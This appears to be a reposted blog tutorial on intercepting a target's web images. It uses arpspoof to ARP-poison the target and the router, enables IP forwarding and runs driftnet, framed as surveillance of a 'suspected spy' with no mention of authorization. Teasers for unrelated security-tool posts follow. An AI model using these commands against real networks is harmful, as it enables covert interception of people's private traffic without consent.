Skip to main content

MitM: Using driftnet to View the Target's Graphics Files

Using MiTM  with driftnet to View the Target's Images
In each of our previous MiTM attacks, we have been able to place ourselves between two users and to view their traffic. This traffic can been seen by using such tools as Wireshark and other packet sniffers. As we can see below, Wireshark shows us with great detail each packet going over the wire.  We can use Wireshark to capture these packets for later detailed analysis.
When we use the Wireshark filter for "HTTP", we can see only the HTTP traffic and we know that this traffic has images in the packets. The problem is that we can't see them or reconstruct them as the images are often fragmented across multiple packets.
The problem comes when we want to see pictures, photos, jpg, png and other graphic files in this stream of traffic. By using Wireshark and other sniffing tools we can see that pictures and other graphic files are passing over the wire or air, but we can't  see what those images are.
Our Scenario
Let's assume that are task is to check to see whether someone we suspect is spying for a foreign government is sending secret images or receiving secret images from their computer. These images might include maps, plans, intellectual property, pictures of other spies, etc.. These images include top secret information that we may  need to view to protect our nation. How can we do it?
First, we need to place ourselves in the middle between the target and their router. In that way, all their traffic must come through us. After doing that, we need to use a tool called "driftnet" that is  specially designed to identify, capture and reconstruct  images. After doing so, it will store them on our computer and display them on our screen.
Step #1: Use arpspoof to place ourselves in the middle
We have used both arpspoof and Ettercap to place ourselves in the middle in the classic MiTM attack. You can use either for this purpose, but in this lesson I will be using arpspoof.  Although Ettercap may be easier to use due to its intuitive GUI, I find that arpspoof is more reliable.
To set up the arpspoof,  remember we need three terminals. In the first one type;
kali > arpspoof -i eth0 -t 192.168.1.1 192.168.1.115
Where:
                -i eth0 is the interface we want to sniff and arpspoof on
                -t target
                192.168.1.1 is the IP address of the router
                192.168.1.115 is the suspected spy's IP
It's worth noting here that if we were doing this MiTM on a wireless network, we could simply replace the "-i eth0" with " -i wlan0".
Then, arpspoof the other end of the connection by reversing the IP addresses.
kali > arpspoof -i eth0 192.168.1.115 192.168.1.1
Finally, we need to set up IP forwarding.
kali > echo 1 > /proc/sys/net/ipv4/ip_forward
Now, we have placed ourselves successfully between our suspected spy and the router. All of his traffic, both coming and going to the Internet, must go through our computer! This opens up a lot of interesting possibilities for us!
Step #2: Set up driftnet
Now, that we have placed ourselves between the spy and his router, we should be able to see all the images that he is sending or receiving over the Internet. Our next step is to activate driftnet. We do this simply by typing driftnet from any terminal in Kali (don't use the open terminals with the arpspoof running as that will terminate the arpspoof).
kali > driftnet
Notice that when we do this, a small window opens up below our terminal. In my case here, it opened to the lower left, but it may open on any free screen real estate.  Maximize this window, as this is where driftnet displays the images it finds and reconstructs.
Step #3: View the Images in Real Time
Now, whenever our spy sends or receives any Internet traffic, it will traverse our system and we can filter, reconstruct, view and save the images.
Now, we simply wait for our suspected spy to go to the Internet.
Suddenly, pictures begin to appear on our screen in the driftnet window!
Looks like our spy is a sports fan! He navigated to www.espn.com and the driftnet app captured and displayed the pictures. This doesn't mean he wasn't up to something nefarious, so we will keep driftnet open to capture more images as he continues to surf the Internet or send files.
Step #4: Find the Stored Images
Although these first images appear to be  innocuous, we still may want to save them for further analysis. In addition, if we leave our MiTM in place and driftnet running, it will continue to capture images.
If we go back to the driftnet command terminal, we will see that driftnet tells us where it is saving the images.
Note that driftnet is saving the images to the /tmp directory with a randomly chosen subdirectory. Interestingly, the subdirectory is misspelled (drifnet rather than driftnet). This can sometimes be confusing. When looking for the images, of course, you must be certain to misspell the directory as well.
Let's navigate to that directory and see what driftnet has captured and saved for us.
kali > cd /tmp/drifnet-1Ilw8b
As you can see, in just a few short seconds, driftnet has captured, reconstructed and saved numerous images. These are all jpeg and gif files, but driftnet is capable of capturing and reconstructing other image files as well, including MPEG and audio files.


from hackers-arise full article here

Popular posts from this blog

BlackArch Linux - Penetration Testing Distribution

BlackArch Linux is an Arch Linux-based penetration testing distribution for penetration testers and security researchers. It contains over 1800 security and hacking tools. Here is the complete list of tools in the BlackArch Linux: 0d1n : Web security tool to make fuzzing at HTTP inputs, made in C with libCurl. 0trace :  A hop enumeration tool. 3proxy : Tiny free proxy server. 3proxy-win32 : Tiny free proxy server. 42zip : Recursive Zip archive bomb. a2sv : Auto Scanning to SSL Vulnerability. abcd : ActionScript ByteCode Disassembler. acccheck : A password dictionary attack tool that targets windows authentication via the SMB protocol. ace : Automated Corporate Enumerator. A simple yet powerful VoIP Corporate Directory enumeration tool that mimics the behavior of an IP Phone in order to download the name and extension entries that a given phone can display on its screen interface ad-ldap-enum : A LDAP based Active Directory user and grou...

Mobile Security Framework (MobSF) - An All-In-One Mobile Application Security Assessment Framework

Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF support mobile app binaries (APK, IPA & APPX) along with zipped source code and provides REST APIs for seamless integration with your CI/CD or DevSecOps pipeline.The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing. Screenshots: Static Analysis - Android Static Analysis - iOS Dynamic Analysis - Android APK Web API Viewer Requirements: Mac: Install Git Install Python 3.6 - 3.7 (3.8 is not supported) macOS Catalina users must uninstall existing python3 and install the one from Python.org . After installation, go to /Applications/Python 3.7/ and run Install Certificates.command and Update Shell Profile.command Install JDK 8+ ...

Maltrail - Malicious Traffic Detection System

Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user-defined lists, where trail can be anything from domain name (e.g. zvpprsensinaix.com for Banjori malware), URL (e.g. https://ift.tt/1O9qs2Q for known malicious executable), IP address (e.g. 185.130.5.231 for known attacker) or HTTP User-Agent header value (e.g. sqlmap for automatic SQL injection and database takeover tool). Also, it uses (optional) advanced heuristic mechanisms that can help in the discovery of unknown threats (e.g. new malware). Requirements: To properly run the Maltrail, Python 2.6.x or 2.7.x is required, together with pcapy (e.g. sudo apt-get install python-pcapy). There are no other requirements, other than to run the Sensor component with the administrative/root privileges. The following (black)lists (i.e. feeds) are being ...